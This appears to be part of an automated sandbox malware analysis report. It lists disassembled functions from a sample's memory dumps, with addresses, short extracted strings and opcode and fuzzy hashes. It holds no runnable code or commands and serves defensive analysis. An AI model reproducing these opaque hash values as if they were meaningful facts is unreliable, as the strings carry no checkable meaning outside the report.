Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58

Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

A67H, xrefs: 004164FD

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: A67H
API String ID: 0-3389657328
Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

Function 024C8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

[, xrefs: 024C942B

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: [
API String ID: 0-3878419350
Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction ID: f38f81cddf609155c09a135ed9160020d4f77e50be5b3bb9523542c530d501b7
Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction Fuzzy Hash: 50021079600702CBCB24CF29C8D1673B7F2FF99714B29859DC4864BBA5EB39A442CB54

Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00436D25

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k
API String ID: 2994545307-1228391949
Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A

Function 024E6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 024E6F8C

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k
API String ID: 0-1228391949
Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction ID: a3e959b3411cbe8836f04771e7512f4ee67a84e4f147c114abe830d688611dc1
Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction Fuzzy Hash: 3DC15975A083505BEB24DF61C880A3FFBE6ABD6715F198A2EE58757780D7319C40CB82

Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

m, xrefs: 00427DE0

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96

Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00425A65

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 167H
API String ID: 2994545307-2704650348
Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A

Function 024D5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 024D5CCC

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: 167H
API String ID: 0-2704650348
Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction ID: 7e6cb8b3ccec96b2211fc08ec0a691d00ed699477dc869af8b87a61b5c40516d
Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction Fuzzy Hash: DBD189726043504BD714CF28CCA17ABB792EFD5314F99862EE9958B3C1DB35D906CB81

Function 024CC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

. , xrefs: 024CC9CE

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction ID: e22d1cfabb2b03b9d946b8363fc2509231edc48f64d1f9603e0359d2ead130ae
Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction Fuzzy Hash: 2CC1F7B5D00611CBCB24CF69C8917BBB7B1FF85314F29825ED899AB790E734A941CB90

Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

. , xrefs: 0041C767

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94

Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00421D7D

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A

Function 024D1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 024D1FE4

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction ID: 7f6bb471b95608a4dbba66505860cd593a9d3b77f50025d6e3857fa8347e9e72
Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction Fuzzy Hash: 32A179726042105BDB19DB28CCA277BB3E5EF91324F09852EFD969B382E3B4D905C752

Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

. , xrefs: 0041CBA7

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4

Function 024CC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

de, xrefs: 024CC5B4

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: de
API String ID: 0-2106599819
Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction ID: 7bdc53a30b8d52bc87f64f75d933471b380c536966d3f6ff4f67ba7528c2e1e7
Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction Fuzzy Hash: 59913575A09311CAC314DF68C8D276BB7F2EF91314F28992EE4DA4B391E7788505C752

Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0041D33B

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Function 024CD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 024CD5A2

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
Instruction ID: 43684e637c79c7a4d2dc8254a630313ad36f94108e9e6e3e42ebd9bc5f4e84cc
Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
Instruction Fuzzy Hash: 7FA12876E042619FC725CE2CCC8066BB7E1AF85324F19823EECA9973D1D7308806D791

Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

RpB, xrefs: 00426FEB

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: RpB
API String ID: 0-664042118
Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

d1, xrefs: 004254D0

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: d1
API String ID: 0-4211392460
Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Function 024C77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

c$, xrefs: 024C796E

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction ID: 9f33a70abb7e22f02562c81848f577c27f76d0998f4fa537c2e44716b7b52db1
Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction Fuzzy Hash: AD9179B41017418FE7648F29C4A0763BBB1FF46318F25958DC4864FBA1E379A846CF94

Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043D315

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Function 024ED557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 024ED57C

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction ID: 6c2cd6c7a8fa5843150644805480181401b5faf854fc6e7a6b8d09dfbefc56b6
Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction Fuzzy Hash: 9681B274A04201DFEB14DF28C881A6FB7F6EF99714F15962DE5868B3A1DB31D841CB42

Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042A5CE

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B

Function 024DA637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 024DA835

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: cc68fb500a0111b1ae57457cefad34049f9da9cfd3ceec5e23b40dd3800afc75
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: D671E432B483258BD7148E28C4A031FBBE2ABC5754F19856FF8949B390D335DD46CB86

Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 0043A869

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0

Function 024EA9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 024EAAD0

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 2078b50914784b8d9db417a5b3604b8a0791e6738ea28f39e8c6f4ab87679682
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 054125B6E117218FD704DFA4CC845ABBB72FB84315B0AC1A8C8857B319E77869078BD0

Function 024ECFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 024ECFEC

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction ID: 94619ad9f45f05d9626e639ce5967c166f5677661f6a9eb7d8857478e47c2437
Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction Fuzzy Hash: 7931D634B05300EFFB209F249C81B3BB7A9DB8671DF18492DE58697390D761E851CE56

Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CEB5

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
Opcode Fuzzy Hash: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A

Function 024ED0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 024ED11C

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction ID: 45f1ea91c298a76cf1c4affb8976c6ef72d52a9bd5da4a35be8a22819faa8b5c
Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction Fuzzy Hash: 1D310734B04301EBFB118B249C81B3BF7E9EB8A719F24462DE68697390D730E850CA56

Function 024D6739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

dB, xrefs: 024D6739

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: dB
API String ID: 0-2104629891
Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C

Function 004143C2 Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A

Function 0043C280 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46

Function 0043C1F0 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46

Function 004166A0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
